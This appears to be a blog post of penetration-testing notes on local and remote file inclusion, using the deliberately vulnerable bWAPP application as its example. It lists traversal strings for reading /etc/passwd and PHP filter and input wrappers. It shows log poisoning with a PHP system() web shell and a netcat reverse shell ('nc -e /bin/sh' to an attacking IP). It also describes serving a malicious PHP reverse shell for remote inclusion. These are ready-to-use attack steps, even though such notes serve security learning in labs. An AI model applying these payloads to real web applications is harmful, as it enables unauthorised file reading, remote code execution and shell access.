File Inclusion (Local and Remote)

on

  1. File Inclusion Attacks : -

    1. Local: - user access local file out of webroot location and executes to application’s environment.
      1. Eg: - url?param = ../../../etc/passwd
      2. Where to find: - any file is getting called from internal storage: 
        1. Eg: - there is a module of languages and when language is getting changed, application calls another php file present in the internal storage.
        2. Request header is like : -
          1. GET /bWAPP/rlfi/php?language=en&action=go HTTP/1.1
          2. Here change language parameters, from en to /etc/passwd. It should work.
          3. If not add /etc/passwd at the end.
          4. Php wrappers: -
            1. php://filter/resource=/etc/passwd
            2. php://filter/read=convert.base64-encode/resource=/etc/passwd
      3. Contaminate the log file : -
        1. On vulnerable machine - tail /var/log/apache2/access.log
        2. Kali - in file include parameter - 
          1. <?php echo system($_GET[“cmd”]);?>
          2. Send the request.
        3. Check the vulnerable machine - 
          1. tail /var/log/apache2/access.log.  it will have the malicious code in the logs.
        4. In same lfi request  -
          1. /var/log/apache2/access.log&cmd=pwd   
      4. Contaminate /proc/self/environfile: -
        1. On lfi request - /proc/self/environ&cmd=pwd
      5. Php wrapper: -
        1. On lfi request - php://input&cmd=pwd
        2. And add below in the lfi request body.
          1. <?php echo system($_GET[“cmd”]);?>
      6. Have a netcat session: -
        1. findwhere the netcat is: -
          1. On lfi request : - php://input&cmd=which%20 nc
            1. It will give the directory in response - /bin/nc
        2. URL decode below mentioned thing: -
          1. php://input&cmd=/bin/nc -e /bin/sh <<attacking ip>> <<port>>
          2. Start the nc - nc -nlvp 443
          3. Forward the request. Will return you the shell.
    2. Path traversal display the content but file inclusion executes also
    3. Remote: - user includes remote file and executes in application’s environment.
      1. Eg: - url?param = http://192.168.200.11/malicious.php
      2. Kali machine :- 
        1. Service apache2 start
        2. Serve a page on local server 192.168.200.11
          1. url?param = http://192.168.200.11/malicious.php
      3. Serve a shell: -
        1. In Kali - 
        2. Get a php reverse shell. Add attacking ip and port
        3. Run nc -nvlp 443.
        4. Go to browser  and load the php reverse shell on  the vulnerable application


Comments

Post a Comment